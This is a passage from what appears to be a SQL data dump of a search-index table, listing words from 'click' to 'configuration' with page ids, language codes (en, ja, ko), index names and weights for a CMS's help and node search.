('click', 79, 'en', 'help_search', 4),
('click', 79, 'ja', 'help_search', 4),
('click', 79, 'ko', 'help_search', 4),
('click', 81, 'en', 'help_search', 2),
('click', 81, 'ja', 'help_search', 2),
('click', 81, 'ko', 'help_search', 2),
('click', 82, 'en', 'help_search', 2),
('click', 82, 'ja', 'help_search', 2),
('click', 82, 'ko', 'help_search', 2),
('click', 83, 'en', 'help_search', 3),
('click', 83, 'ja', 'help_search', 3),
('click', 83, 'ko', 'help_search', 3),
('click', 85, 'en', 'help_search', 1),
('click', 85, 'ja', 'help_search', 1),
('click', 85, 'ko', 'help_search', 1),
('click', 86, 'en', 'help_search', 0.972861),
('click', 86, 'ja', 'help_search', 0.972861),
('click', 86, 'ko', 'help_search', 0.972861),
('click', 87, 'en', 'help_search', 5),
('click', 87, 'ja', 'help_search', 5),
('click', 87, 'ko', 'help_search', 5),
('click', 88, 'en', 'help_search', 4),
('click', 88, 'ja', 'help_search', 4),
('click', 88, 'ko', 'help_search', 4),
('click', 89, 'en', 'help_search', 4.98902),
('click', 89, 'ja', 'help_search', 4.98493),
('click', 89, 'ko', 'help_search', 4.98902),
('click', 90, 'en', 'help_search', 2),
('click', 90, 'ja', 'help_search', 2),
('click', 90, 'ko', 'help_search', 2),
('click', 91, 'en', 'help_search', 10.9809),
('click', 91, 'ja', 'help_search', 10.9769),
('click', 91, 'ko', 'help_search', 10.9809),
('click', 92, 'en', 'help_search', 1),
('click', 92, 'ja', 'help_search', 1),
('click', 92, 'ko', 'help_search', 1),
('clicked', 22, 'en', 'help_search', 1),
('clicked', 22, 'ja', 'help_search', 1),
('clicked', 22, 'ko', 'help_search', 1),
('clicking', 7, 'en', 'help_search', 0.98493),
('clicking', 7, 'ja', 'help_search', 0.98493),
('clicking', 7, 'ko', 'help_search', 0.98493),
('clicking', 9, 'en', 'help_search', 1),
('clicking', 9, 'ja', 'help_search', 1),
('clicking', 9, 'ko', 'help_search', 1),
('clicking', 22, 'en', 'help_search', 1),
('clicking', 22, 'ja', 'help_search', 1),
('clicking', 22, 'ko', 'help_search', 1),
('clicking', 42, 'en', 'help_search', 1),
('clicking', 42, 'ja', 'help_search', 1),
('clicking', 42, 'ko', 'help_search', 1),
('clicking', 54, 'en', 'help_search', 1),
('clicking', 54, 'ja', 'help_search', 1),
('clicking', 54, 'ko', 'help_search', 1),
('clicking', 61, 'en', 'help_search', 1),
('clicking', 61, 'ja', 'help_search', 1),
('clicking', 61, 'ko', 'help_search', 1),
('clicking', 69, 'en', 'help_search', 1),
('clicking', 69, 'ja', 'help_search', 1),
('clicking', 69, 'ko', 'help_search', 1),
('clicking', 91, 'en', 'help_search', 1),
('clicking', 91, 'ja', 'help_search', 1),
('clicking', 91, 'ko', 'help_search', 1),
('clicks', 68, 'en', 'help_search', 1),
('clicks', 68, 'ja', 'help_search', 1),
('clicks', 68, 'ko', 'help_search', 1),
('clients', 25, 'en', 'node_search', 2),
('clients', 27, 'en', 'node_search', 0.816452),
('clients', 162, 'en', 'node_search', 1),
('clipboard', 13, 'en', 'help_search', 1),
('clipboard', 13, 'ja', 'help_search', 1),
('clipboard', 13, 'ko', 'help_search', 1),
('clipboard', 15, 'en', 'help_search', 2),
('clipboard', 15, 'ja', 'help_search', 2),
('clipboard', 15, 'ko', 'help_search', 2),
('cloned', 30, 'en', 'help_search', 0.842342),
('cloned', 30, 'ja', 'help_search', 0.842342),
('cloned', 30, 'ko', 'help_search', 0.842342),
('clones', 30, 'en', 'help_search', 0.860547),
('clones', 30, 'ja', 'help_search', 0.860547),
('clones', 30, 'ko', 'help_search', 0.860547),
('cloning', 30, 'en', 'help_search', 0.857458),
('cloning', 30, 'ja', 'help_search', 0.857458),
('cloning', 30, 'ko', 'help_search', 0.857458),
('close', 81, 'en', 'help_search', 1),
('close', 81, 'ja', 'help_search', 1),
('close', 81, 'ko', 'help_search', 1),
('closed', 7, 'en', 'help_search', 3.63897),
('closed', 7, 'ja', 'help_search', 3.63897),
('closed', 7, 'ko', 'help_search', 3.63897),
('closed', 9, 'en', 'help_search', 4),
('closed', 9, 'ja', 'help_search', 4),
('closed', 9, 'ko', 'help_search', 4),
('closer', 194, 'en', 'node_search', 1),
('closer', 196, 'en', 'node_search', 1),
('closer', 198, 'en', 'node_search', 1),
('code', 49, 'en', 'help_search', 4),
('code', 49, 'ja', 'help_search', 4),
('code', 49, 'ko', 'help_search', 4),
('code', 72, 'en', 'help_search', 4),
('code', 72, 'ja', 'help_search', 4),
('code', 72, 'ko', 'help_search', 4),
('codebase', 30, 'en', 'help_search', 0.854391),
('codebase', 30, 'ja', 'help_search', 0.854391),
('codebase', 30, 'ko', 'help_search', 0.854391),
('codes', 71, 'en', 'help_search', 12),
('codes', 71, 'ja', 'help_search', 12),
('codes', 71, 'ko', 'help_search', 12),
('codes', 72, 'en', 'help_search', 1),
('codes', 72, 'ja', 'help_search', 1),
('codes', 72, 'ko', 'help_search', 1),
('coe', 83, 'en', 'node_search', 29),
('coe', 83, 'ja', 'node_search', 29),
('coe', 86, 'en', 'node_search', 29),
('coe', 86, 'ja', 'node_search', 29),
('coe', 88, 'en', 'node_search', 29),
('coe', 88, 'ja', 'node_search', 29),
('coe', 89, 'en', 'node_search', 29),
('coe', 89, 'ja', 'node_search', 29),
('coe', 91, 'en', 'node_search', 29),
('coe', 91, 'ja', 'node_search', 29),
('coe', 92, 'en', 'node_search', 29),
('coe', 92, 'ja', 'node_search', 29),
('coe', 93, 'en', 'node_search', 31),
('coe', 93, 'ja', 'node_search', 29),
('coe', 94, 'en', 'node_search', 29),
('coe', 96, 'en', 'node_search', 29),
('coe', 96, 'ja', 'node_search', 29),
('coe', 97, 'en', 'node_search', 29),
('coe', 97, 'ja', 'node_search', 29),
('coe', 99, 'en', 'node_search', 29),
('coe', 99, 'ja', 'node_search', 29),
('coe', 103, 'en', 'node_search', 29),
('coe', 103, 'ja', 'node_search', 30),
('coe', 105, 'en', 'node_search', 29),
('coe', 105, 'ja', 'node_search', 29),
('coe', 108, 'en', 'node_search', 29),
('coe', 108, 'ja', 'node_search', 29),
('coe', 145, 'en', 'node_search', 47),
('coe', 145, 'ja', 'node_search', 47),
('coe', 147, 'en', 'node_search', 34),
('coe', 147, 'ja', 'node_search', 34),
('coe', 148, 'en', 'node_search', 28),
('coe', 148, 'ja', 'node_search', 28),
('coe', 151, 'en', 'node_search', 47),
('coe', 151, 'ja', 'node_search', 47),
('coe', 152, 'en', 'node_search', 47),
('coe', 152, 'ja', 'node_search', 47),
('coe', 153, 'en', 'node_search', 47),
('coe', 153, 'ja', 'node_search', 47),
('collected', 7, 'en', 'help_search', 1),
('collected', 7, 'ja', 'help_search', 1),
('collected', 7, 'ko', 'help_search', 1),
('collection', 31, 'ja', 'help_search', 0.972861),
('collection', 36, 'en', 'help_search', 1),
('collection', 36, 'ja', 'help_search', 1),
('collection', 36, 'ko', 'help_search', 1),
('collectively', 67, 'en', 'help_search', 1),
('collectively', 67, 'ja', 'help_search', 1),
('collectively', 67, 'ko', 'help_search', 1),
('college', 10, 'en', 'node_search', 1),
('college', 10, 'ko', 'node_search', 1),
('college', 27, 'en', 'node_search', 1.72942),
('coltd', 27, 'en', 'node_search', 7),
('column', 16, 'en', 'help_search', 1),
('column', 16, 'ja', 'help_search', 1),
('column', 16, 'ko', 'help_search', 1),
('column', 23, 'en', 'help_search', 1),
('column', 23, 'ja', 'help_search', 1),
('column', 23, 'ko', 'help_search', 1),
('column', 25, 'en', 'help_search', 2),
('column', 25, 'ja', 'help_search', 2),
('column', 26, 'en', 'help_search', 1),
('column', 26, 'ja', 'help_search', 1),
('column', 26, 'ko', 'help_search', 1),
('column', 53, 'en', 'help_search', 1),
('column', 53, 'ja', 'help_search', 1),
('column', 53, 'ko', 'help_search', 1),
('column', 61, 'en', 'help_search', 3),
('column', 61, 'ja', 'help_search', 3),
('column', 61, 'ko', 'help_search', 3),
('column', 66, 'en', 'help_search', 1),
('column', 66, 'ja', 'help_search', 1),
('column', 67, 'en', 'help_search', 0.873132),
('column', 67, 'ja', 'help_search', 0.873132),
('column', 67, 'ko', 'help_search', 0.873132),
('column', 75, 'en', 'help_search', 2),
('column', 75, 'ja', 'help_search', 2),
('column', 75, 'ko', 'help_search', 2),
('column', 85, 'en', 'help_search', 1),
('column', 85, 'ja', 'help_search', 1),
('column', 85, 'ko', 'help_search', 1),
('combo', 66, 'en', 'node_search', 1),
('come', 4, 'en', 'node_search', 1),
('come', 4, 'ja', 'node_search', 1),
('come', 6, 'en', 'node_search', 3),
('come', 31, 'en', 'node_search', 1),
('come', 34, 'en', 'help_search', 1),
('come', 34, 'ja', 'help_search', 1),
('come', 34, 'ko', 'help_search', 1),
('come', 87, 'en', 'node_search', 1),
('come', 93, 'en', 'help_search', 0.913226),
('come', 93, 'ja', 'help_search', 0.913226),
('come', 93, 'ko', 'help_search', 0.913226),
('comes', 56, 'en', 'help_search', 1),
('comes', 56, 'ja', 'help_search', 1),
('comes', 56, 'ko', 'help_search', 1),
('comet', 1, 'en', 'node_search', 17),
('comet', 1, 'ja', 'node_search', 26),
('comet', 1, 'ko', 'node_search', 17),
('comet', 4, 'en', 'node_search', 1),
('comet', 4, 'ja', 'node_search', 1),
('comet', 4, 'ko', 'node_search', 1),
('comet', 5, 'en', 'node_search', 1),
('comet', 5, 'ja', 'node_search', 0.729424),
('comet', 5, 'ko', 'node_search', 1),
('comet', 9, 'en', 'node_search', 28),
('comet', 9, 'ko', 'node_search', 28),
('comet', 10, 'en', 'node_search', 1),
('comet', 10, 'ja', 'node_search', 1),
('comet', 10, 'ko', 'node_search', 1),
('comet', 11, 'en', 'node_search', 16),
('comet', 17, 'en', 'node_search', 30),
('comet', 17, 'ko', 'node_search', 30),
('comet', 18, 'en', 'node_search', 1),
('comet', 18, 'ja', 'node_search', 0.889397),
('comet', 18, 'ko', 'node_search', 1),
('comet', 19, 'en', 'node_search', 1),
('comet', 19, 'ko', 'node_search', 1),
('comet', 23, 'en', 'node_search', 9.65304),
('comet', 23, 'ko', 'node_search', 2.78177),
('comet', 24, 'en', 'node_search', 0.822065),
('comet', 24, 'ko', 'node_search', 1.81645),
('comet', 27, 'en', 'node_search', 15.7305),
('comet', 28, 'en', 'node_search', 3),
('comet', 28, 'ja', 'node_search', 28),
('comet', 28, 'ko', 'node_search', 28),
('comet', 29, 'en', 'node_search', 28),
('comet', 29, 'ja', 'node_search', 28),
('comet', 29, 'ko', 'node_search', 28),
('comet', 30, 'en', 'node_search', 1),
('comet', 30, 'ja', 'node_search', 0.839384),
('comet', 30, 'ko', 'node_search', 1),
('comet', 62, 'en', 'node_search', 1),
('comet', 62, 'ja', 'node_search', 0.792123),
('comet', 66, 'en', 'node_search', 4.97286),
('comet', 67, 'ja', 'node_search', 1),
('comet', 69, 'en', 'node_search', 2),
('comet', 69, 'ja', 'node_search', 1.91323),
('comet', 98, 'en', 'node_search', 1),
('comet', 98, 'ja', 'node_search', 19),
('comet', 133, 'en', 'node_search', 2),
('comet', 135, 'en', 'node_search', 3),
('comet', 136, 'en', 'node_search', 2),
('comet', 138, 'en', 'node_search', 2),
('comet', 142, 'en', 'node_search', 46),
('comet', 142, 'ja', 'node_search', 27),
('comet', 154, 'en', 'node_search', 2),
('comet', 155, 'en', 'node_search', 1),
('comet', 156, 'en', 'node_search', 2),
('comet', 156, 'ja', 'node_search', 1),
('comet', 157, 'en', 'node_search', 3),
('comet', 157, 'ja', 'node_search', 1),
('comet', 160, 'en', 'node_search', 2),
('comet', 161, 'en', 'node_search', 2),
('comet', 162, 'en', 'node_search', 1.86366),
('comet', 163, 'en', 'node_search', 1.85135),
('comet', 164, 'en', 'node_search', 2),
('comet', 165, 'en', 'node_search', 2),
('comet', 166, 'en', 'node_search', 1),
('comet', 167, 'en', 'node_search', 2),
('comet', 168, 'en', 'node_search', 1),
('comet', 169, 'en', 'node_search', 1),
('comet', 170, 'en', 'node_search', 1),
('comet', 171, 'en', 'node_search', 1),
('comet', 173, 'en', 'node_search', 2),
('comet', 174, 'en', 'node_search', 2),
('comet', 175, 'en', 'node_search', 2),
('comet', 176, 'en', 'node_search', 1),
('comet', 177, 'en', 'node_search', 1),
('comet', 178, 'en', 'node_search', 1),
('comet', 179, 'en', 'node_search', 2),
('comet', 180, 'en', 'node_search', 1),
('comet', 181, 'en', 'node_search', 3),
('comet', 182, 'en', 'node_search', 3),
('comet', 183, 'en', 'node_search', 3),
('comet', 184, 'en', 'node_search', 1),
('comet', 185, 'en', 'node_search', 1),
('comet', 186, 'en', 'node_search', 1),
('comet', 187, 'en', 'node_search', 1),
('comet', 188, 'en', 'node_search', 1),
('comet', 189, 'en', 'node_search', 1),
('comet', 190, 'en', 'node_search', 1),
('comet', 191, 'en', 'node_search', 1),
('comet', 192, 'en', 'node_search', 1),
('comet', 193, 'en', 'node_search', 1),
('comet', 194, 'en', 'node_search', 1),
('comet', 195, 'en', 'node_search', 1),
('comet', 196, 'en', 'node_search', 1),
('comet', 197, 'en', 'node_search', 1),
('comet', 198, 'en', 'node_search', 1),
('comet', 199, 'en', 'node_search', 1),
('cometadmin', 1, 'ja', 'node_search', 1),
('cometadmin', 1, 'ko', 'node_search', 1),
('cometadmin', 3, 'ja', 'node_search', 1),
('cometadmin', 3, 'ko', 'node_search', 1),
('cometadmin', 4, 'ja', 'node_search', 1),
('cometadmin', 4, 'ko', 'node_search', 1),
('cometadmin', 5, 'ko', 'node_search', 1),
('cometadmin', 6, 'ja', 'node_search', 1),
('cometadmin', 6, 'ko', 'node_search', 1),
('cometadmin', 7, 'ja', 'node_search', 1),
('cometadmin', 7, 'ko', 'node_search', 1),
('cometadmin', 8, 'ja', 'node_search', 1),
('cometadmin', 8, 'ko', 'node_search', 1),
('cometadmin', 9, 'ja', 'node_search', 1),
('cometadmin', 9, 'ko', 'node_search', 1),
('cometadmin', 10, 'ja', 'node_search', 1),
('cometadmin', 10, 'ko', 'node_search', 1),
('cometadmin', 11, 'ja', 'node_search', 1),
('cometadmin', 11, 'ko', 'node_search', 1),
('cometadmin', 17, 'ja', 'node_search', 1),
('cometadmin', 17, 'ko', 'node_search', 1),
('cometadmin', 18, 'ja', 'node_search', 1),
('cometadmin', 18, 'ko', 'node_search', 1),
('cometadmin', 19, 'ja', 'node_search', 1),
('cometadmin', 19, 'ko', 'node_search', 1),
('cometadmin', 20, 'ja', 'node_search', 1),
('cometadmin', 20, 'ko', 'node_search', 1),
('cometadmin', 21, 'en', 'node_search', 1),
('cometadmin', 22, 'en', 'node_search', 1),
('cometadmin', 23, 'en', 'node_search', 1),
('cometadmin', 23, 'ja', 'node_search', 1),
('cometadmin', 23, 'ko', 'node_search', 1),
('cometadmin', 24, 'en', 'node_search', 1),
('cometadmin', 24, 'ja', 'node_search', 1),
('cometadmin', 24, 'ko', 'node_search', 1),
('cometadmin', 25, 'en', 'node_search', 1),
('cometadmin', 25, 'ja', 'node_search', 1),
('cometadmin', 25, 'ko', 'node_search', 1),
('cometadmin', 26, 'en', 'node_search', 1),
('cometadmin', 26, 'ja', 'node_search', 1),
('cometadmin', 26, 'ko', 'node_search', 1),
('cometadmin', 27, 'en', 'node_search', 1),
('cometadmin', 27, 'ja', 'node_search', 1),
('cometadmin', 27, 'ko', 'node_search', 1),
('cometadmin', 204, 'en', 'node_search', 1),
('cometadmin', 204, 'ja', 'node_search', 1),
('cometadmin', 205, 'en', 'node_search', 1),
('cometadmin', 205, 'ja', 'node_search', 1),
('cometadmin', 206, 'ja', 'node_search', 1),
('coming', 27, 'ko', 'node_search', 1),
('command', 23, 'en', 'help_search', 1),
('command', 23, 'ja', 'help_search', 1),
('command', 23, 'ko', 'help_search', 1),
('command', 32, 'en', 'help_search', 1),
('command', 32, 'ja', 'help_search', 1),
('command', 32, 'ko', 'help_search', 1),
('commandline', 30, 'en', 'help_search', 0.729424),
('commandline', 30, 'ja', 'help_search', 0.729424),
('commandline', 30, 'ko', 'help_search', 0.729424),
('commence', 140, 'en', 'node_search', 1),
('commencement', 142, 'en', 'node_search', 46),
('commencement', 142, 'ja', 'node_search', 27),
('commend', 140, 'en', 'node_search', 1),
('comment', 7, 'en', 'help_search', 30.4076),
('comment', 7, 'ja', 'help_search', 30.4076),
('comment', 7, 'ko', 'help_search', 30.4076),
('comment', 8, 'en', 'help_search', 63),
('comment', 8, 'ja', 'help_search', 63),
('comment', 8, 'ko', 'help_search', 63),
('comment', 9, 'en', 'help_search', 11),
('comment', 9, 'ja', 'help_search', 11),
('comment', 9, 'ko', 'help_search', 11),
('comment', 10, 'en', 'help_search', 19),
('comment', 10, 'ja', 'help_search', 19),
('comment', 10, 'ko', 'help_search', 19),
('comment', 11, 'en', 'help_search', 55.4508),
('comment', 11, 'ja', 'help_search', 55.4508),
('comment', 11, 'ko', 'help_search', 55.4508),
('comment', 31, 'ja', 'help_search', 2.38267),
('commentary', 11, 'en', 'help_search', 1),
('commentary', 11, 'ja', 'help_search', 1),
('commentary', 11, 'ko', 'help_search', 1),
('commented', 8, 'en', 'help_search', 1),
('commented', 8, 'ja', 'help_search', 1),
('commented', 8, 'ko', 'help_search', 1),
('commenters', 7, 'en', 'help_search', 1),
('commenters', 7, 'ja', 'help_search', 1),
('commenters', 7, 'ko', 'help_search', 1),
('commenting', 7, 'en', 'help_search', 5),
('commenting', 7, 'ja', 'help_search', 5),
('commenting', 7, 'ko', 'help_search', 5),
('commenting', 9, 'en', 'help_search', 3),
('commenting', 9, 'ja', 'help_search', 3),
('commenting', 9, 'ko', 'help_search', 3),
('commenting', 11, 'en', 'help_search', 1.87634),
('commenting', 11, 'ja', 'help_search', 1.87634),
('commenting', 11, 'ko', 'help_search', 1.87634),
('comments', 7, 'en', 'help_search', 77.2798),
('comments', 7, 'ja', 'help_search', 77.2798),
('comments', 7, 'ko', 'help_search', 77.2798),
('comments', 8, 'en', 'help_search', 2),
('comments', 8, 'ja', 'help_search', 2),
('comments', 8, 'ko', 'help_search', 2),
('comments', 9, 'en', 'help_search', 58),
('comments', 9, 'ja', 'help_search', 58),
('comments', 9, 'ko', 'help_search', 58),
('comments', 10, 'en', 'help_search', 76),
('comments', 10, 'ja', 'help_search', 76),
('comments', 10, 'ko', 'help_search', 76),
('comments', 11, 'en', 'help_search', 51.8436),
('comments', 11, 'ja', 'help_search', 51.8436),
('comments', 11, 'ko', 'help_search', 51.8436),
('comments', 31, 'ja', 'help_search', 0.869951),
('comments', 43, 'en', 'help_search', 1),
('comments', 43, 'ja', 'help_search', 1),
('comments', 43, 'ko', 'help_search', 1),
('comments', 93, 'en', 'help_search', 1),
('comments', 93, 'ja', 'help_search', 1),
('comments', 93, 'ko', 'help_search', 1),
('commerce', 23, 'en', 'node_search', 1),
('commerce', 27, 'en', 'node_search', 0.638366),
('commercial', 27, 'en', 'node_search', 0.747619),
('commitment', 160, 'en', 'node_search', 1),
('commitment', 162, 'en', 'node_search', 0.920273),
('commitment', 168, 'en', 'node_search', 1),
('commitment', 170, 'en', 'node_search', 1),
('commitment', 180, 'en', 'node_search', 1),
('commitment', 181, 'en', 'node_search', 1),
('commitment', 182, 'en', 'node_search', 1),
('commitment', 184, 'en', 'node_search', 1),
('commitment', 186, 'en', 'node_search', 1),
('commitment', 189, 'en', 'node_search', 28),
('commitment', 190, 'en', 'node_search', 1),
('commitment', 191, 'en', 'node_search', 1),
('commitment', 195, 'en', 'node_search', 1),
('commitment', 198, 'en', 'node_search', 1),
('commitment', 199, 'en', 'node_search', 1),
('committed', 67, 'ja', 'node_search', 1),
('committed', 136, 'en', 'node_search', 1),
('committed', 161, 'en', 'node_search', 1),
('committed', 164, 'en', 'node_search', 1),
('committed', 167, 'en', 'node_search', 1),
('committed', 175, 'en', 'node_search', 1),
('committed', 179, 'en', 'node_search', 1),
('common', 27, 'en', 'help_search', 1),
('common', 27, 'ja', 'help_search', 1),
('common', 27, 'ko', 'help_search', 1),
('common', 80, 'en', 'help_search', 1),
('common', 80, 'ja', 'help_search', 1),
('common', 80, 'ko', 'help_search', 1),
('common', 88, 'en', 'help_search', 1),
('common', 88, 'ja', 'help_search', 1),
('common', 88, 'ko', 'help_search', 1),
('commonly', 28, 'en', 'help_search', 1),
('commonly', 28, 'ja', 'help_search', 1),
('commonly', 28, 'ko', 'help_search', 1),
('commonly', 31, 'ja', 'help_search', 1),
('commonlyused', 43, 'en', 'help_search', 1),
('commonlyused', 43, 'ja', 'help_search', 1),
('commonlyused', 43, 'ko', 'help_search', 1),
('commonlyused', 50, 'en', 'help_search', 1),
('commonlyused', 50, 'ja', 'help_search', 1),
('commonlyused', 50, 'ko', 'help_search', 1),
('commonlyused', 86, 'en', 'help_search', 1),
('commonlyused', 86, 'ja', 'help_search', 1),
('commonlyused', 86, 'ko', 'help_search', 1),
('communication', 18, 'en', 'node_search', 1),
('communication', 18, 'ko', 'node_search', 1),
('communication', 24, 'en', 'node_search', 0.771698),
('communications', 9, 'en', 'node_search', 3),
('communications', 17, 'en', 'node_search', 4),
('communications', 24, 'en', 'node_search', 1),
('communities', 165, 'en', 'node_search', 1),
('communities', 169, 'en', 'node_search', 1),
('community', 10, 'en', 'node_search', 1),
('community', 10, 'ko', 'node_search', 1),
('community', 11, 'en', 'help_search', 0.931053),
('community', 11, 'ja', 'help_search', 0.931053),
('community', 11, 'ko', 'help_search', 0.931053),
('communitymembers', 41, 'en', 'help_search', 1),
('communitymembers', 41, 'ja', 'help_search', 1),
('communitymembers', 41, 'ko', 'help_search', 1),
('communityprovided', 41, 'en', 'help_search', 2),
('communityprovided', 41, 'ja', 'help_search', 2),
('communityprovided', 41, 'ko', 'help_search', 2),
('companies', 23, 'en', 'node_search', 2),
('companies', 27, 'en', 'node_search', 1.85439),
('company', 5, 'en', 'node_search', 1),
('company', 5, 'ko', 'node_search', 1),
('company', 23, 'en', 'node_search', 32.7767),
('company', 25, 'en', 'node_search', 1),
('company', 26, 'en', 'node_search', 2),
('company', 27, 'en', 'node_search', 35.8677),
('company', 27, 'ko', 'node_search', 27),
('company', 31, 'en', 'node_search', 2),
('compares', 30, 'en', 'help_search', 0.759465),
('compares', 30, 'ja', 'help_search', 0.759465),
('compares', 30, 'ko', 'help_search', 0.759465),
('comparison', 44, 'en', 'help_search', 11),
('comparison', 44, 'ja', 'help_search', 11),
('comparison', 44, 'ko', 'help_search', 11),
('compassion', 189, 'en', 'node_search', 1),
('compassionate', 162, 'en', 'node_search', 0.906287),
('complete', 12, 'en', 'help_search', 26),
('complete', 12, 'ja', 'help_search', 26),
('complete', 12, 'ko', 'help_search', 26),
('complete', 14, 'en', 'help_search', 28),
('complete', 14, 'ja', 'help_search', 28),
('complete', 14, 'ko', 'help_search', 28),
('complete', 22, 'en', 'help_search', 0.98493),
('complete', 22, 'ja', 'help_search', 0.98493),
('complete', 22, 'ko', 'help_search', 0.98493),
('complete', 23, 'en', 'help_search', 0.839384),
('complete', 23, 'ja', 'help_search', 0.839384),
('complete', 23, 'ko', 'help_search', 0.839384),
('complete', 45, 'en', 'help_search', 1),
('complete', 45, 'ja', 'help_search', 1),
('complete', 45, 'ko', 'help_search', 1),
('complete', 69, 'en', 'help_search', 0.993146),
('complete', 69, 'ja', 'help_search', 0.993146),
('complete', 69, 'ko', 'help_search', 0.993146),
('complete', 92, 'en', 'help_search', 0.993146),
('complete', 92, 'ja', 'help_search', 0.993146),
('complete', 92, 'ko', 'help_search', 0.993146),
('completed', 27, 'en', 'node_search', 1.85439),
('completed', 181, 'en', 'node_search', 1),
('completed', 184, 'en', 'node_search', 1),
('completed', 194, 'en', 'node_search', 1),
('completely', 87, 'en', 'node_search', 1),
('completes', 49, 'en', 'help_search', 1),
('completes', 49, 'ja', 'help_search', 1),
('completes', 49, 'ko', 'help_search', 1),
('completing', 136, 'en', 'node_search', 1),
('completing', 142, 'en', 'node_search', 1),
('completing', 169, 'en', 'node_search', 1),
('completing', 173, 'en', 'node_search', 1),
('completing', 181, 'en', 'node_search', 1),
('completing', 183, 'en', 'node_search', 5),
('completing', 193, 'en', 'node_search', 1),
('completion', 31, 'en', 'node_search', 0.899454),
('completion', 62, 'en', 'node_search', 1),
('completion', 133, 'en', 'node_search', 46),
('completion', 133, 'ja', 'node_search', 27),
('completion', 138, 'en', 'node_search', 46),
('completion', 138, 'ja', 'node_search', 27),
('completion', 182, 'en', 'node_search', 1),
('complex', 27, 'en', 'node_search', 0.78951),
('complex', 30, 'en', 'help_search', 1),
('complex', 30, 'ja', 'help_search', 1),
('complex', 30, 'ko', 'help_search', 1),
('complex', 44, 'en', 'help_search', 1),
('complex', 44, 'ja', 'help_search', 1),
('complex', 44, 'ko', 'help_search', 1),
('complex', 62, 'en', 'node_search', 1),
('complex', 68, 'en', 'help_search', 0.892724),
('complex', 68, 'ja', 'help_search', 0.892724),
('complex', 68, 'ko', 'help_search', 0.892724),
('compliance', 42, 'en', 'help_search', 1),
('compliance', 42, 'ja', 'help_search', 1),
('compliance', 42, 'ko', 'help_search', 1),
('compliant', 44, 'en', 'help_search', 1),
('compliant', 44, 'ja', 'help_search', 1),
('compliant', 44, 'ko', 'help_search', 1),
('components', 43, 'en', 'help_search', 20),
('components', 43, 'ja', 'help_search', 20),
('components', 43, 'ko', 'help_search', 20),
('components', 93, 'en', 'help_search', 20),
('components', 93, 'ja', 'help_search', 20),
('components', 93, 'ko', 'help_search', 20),
('composed', 71, 'en', 'help_search', 1),
('composed', 71, 'ja', 'help_search', 1),
('composed', 71, 'ko', 'help_search', 1),
('comprehension', 62, 'en', 'node_search', 1),
('comprehensive', 62, 'en', 'node_search', 1),
('comprehensive', 66, 'en', 'node_search', 1),
('comprehensive', 136, 'en', 'node_search', 1),
('compressed', 37, 'en', 'help_search', 1),
('compressed', 37, 'ja', 'help_search', 1),
('compressed', 37, 'ko', 'help_search', 1),
('computer', 13, 'en', 'help_search', 1),
('computer', 13, 'ja', 'help_search', 1),
('computer', 13, 'ko', 'help_search', 1),
('computer', 15, 'en', 'help_search', 1),
('computer', 15, 'ja', 'help_search', 1),
('computer', 15, 'ko', 'help_search', 1),
('computer', 24, 'en', 'node_search', 1.62309),
('computer', 24, 'ko', 'node_search', 0.731649),
('computer', 30, 'en', 'node_search', 2),
('concept', 30, 'en', 'help_search', 14.7488),
('concept', 30, 'ja', 'help_search', 14.7488),
('concept', 30, 'ko', 'help_search', 14.7488),
('concept', 32, 'en', 'help_search', 10.6579),
('concept', 32, 'ja', 'help_search', 10.6579),
('concept', 32, 'ko', 'help_search', 10.6579),
('concept', 33, 'en', 'help_search', 11),
('concept', 33, 'ja', 'help_search', 11),
('concept', 33, 'ko', 'help_search', 11),
('concept', 36, 'en', 'help_search', 11),
('concept', 36, 'ja', 'help_search', 11),
('concept', 36, 'ko', 'help_search', 11),
('concept', 46, 'en', 'help_search', 1),
('concept', 46, 'ja', 'help_search', 1),
('concept', 46, 'ko', 'help_search', 1),
('concept', 65, 'en', 'help_search', 11),
('concept', 65, 'ja', 'help_search', 11),
('concept', 65, 'ko', 'help_search', 11),
('concept', 70, 'en', 'help_search', 11),
('concept', 70, 'ja', 'help_search', 11),
('concept', 70, 'ko', 'help_search', 11),
('concept', 80, 'en', 'help_search', 9.74705),
('concept', 80, 'ja', 'help_search', 9.74705),
('concept', 80, 'ko', 'help_search', 9.74705),
('concepts', 30, 'en', 'help_search', 0.819249),
('concepts', 30, 'ja', 'help_search', 0.819249),
('concepts', 30, 'ko', 'help_search', 0.819249),
('concepts', 81, 'en', 'help_search', 1),
('concepts', 81, 'ja', 'help_search', 1),
('concepts', 81, 'ko', 'help_search', 1),
('concluded', 133, 'en', 'node_search', 1),
('conditions', 1, 'en', 'help_search', 1),
('conditions', 1, 'ja', 'help_search', 1),
('conditions', 1, 'ko', 'help_search', 1),
('conditions', 26, 'en', 'node_search', 1),
('conditions', 70, 'en', 'help_search', 1),
('conditions', 70, 'ja', 'help_search', 1),
('conditions', 70, 'ko', 'help_search', 1),
('condominium', 27, 'en', 'node_search', 0.839384),
('conducted', 142, 'en', 'node_search', 1),
('conducting', 67, 'ja', 'node_search', 1),
('confidence', 136, 'en', 'node_search', 1),
('confidence', 178, 'en', 'node_search', 1),
('confidence', 190, 'en', 'node_search', 1),
('confidence', 193, 'en', 'node_search', 1),
('confident', 116, 'en', 'node_search', 1),
('confident', 156, 'en', 'node_search', 1),
('confident', 157, 'en', 'node_search', 1),
('confident', 176, 'en', 'node_search', 1),
('confident', 188, 'en', 'node_search', 1),
('config', 30, 'en', 'help_search', 8),
('config', 30, 'ja', 'help_search', 8),
('config', 30, 'ko', 'help_search', 8),
('configurable', 43, 'en', 'help_search', 1),
('configurable', 43, 'ja', 'help_search', 1),
('configurable', 43, 'ko', 'help_search', 1),
('configuration', 3, 'en', 'help_search', 1),
('configuration', 3, 'ja', 'help_search', 1),
('configuration', 3, 'ko', 'help_search', 1),
('configuration', 12, 'en', 'help_search', 37),
('configuration', 12, 'ja', 'help_search', 37),
('configuration', 12, 'ko', 'help_search', 37),
('configuration', 13, 'en', 'help_search', 49),
('configuration', 13, 'ja', 'help_search', 49),
('configuration', 13, 'ko', 'help_search', 49),
('configuration', 14, 'en', 'help_search', 46),
('configuration', 14, 'ja', 'help_search', 46),
('configuration', 14, 'ko', 'help_search', 46),
('configuration', 15, 'en', 'help_search', 47),
('configuration', 15, 'ja', 'help_search', 47),
('configuration', 15, 'ko', 'help_search', 47),
('configuration', 16, 'en', 'help_search', 44),
('configuration', 16, 'ja', 'help_search', 44),
('configuration', 16, 'ko', 'help_search', 44),
('configuration', 17, 'en', 'help_search', 1),
('configuration', 17, 'ja', 'help_search', 1),
('configuration', 17, 'ko', 'help_search', 1),
('configuration', 18, 'en', 'help_search', 8),
('configuration', 18, 'ja', 'help_search', 8),
